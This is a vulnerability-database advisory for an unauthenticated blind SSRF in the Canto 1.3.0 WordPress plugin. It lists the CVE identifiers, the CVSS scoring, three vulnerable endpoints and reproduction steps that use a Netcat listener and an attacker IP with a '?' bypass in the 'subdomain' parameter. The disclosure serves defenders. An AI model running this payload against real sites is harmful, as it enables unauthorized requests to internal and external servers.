WordPress Canto 1.3.0 Server-Side Request Forgery

2020.12.07
Credit: Pankaj Verma
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2020-28978
CWE: CWE-918


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) # Date: 03/12/2020 # Exploit Author: Pankaj Verma (_p4nk4j) # Vendor Homepage: https://www.canto.com/integrations/wordpress/ # Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin # Version: 1.3.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978 Description:- The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter. Vulnerable Parameters and Endpoints:- https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain= Steps To Reproduce:- 1. Start a Netcat Listener on any port For e.g. 4499 2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain=" 3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. 4. Observe the response we got from the Target on Attacker's Listener. Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top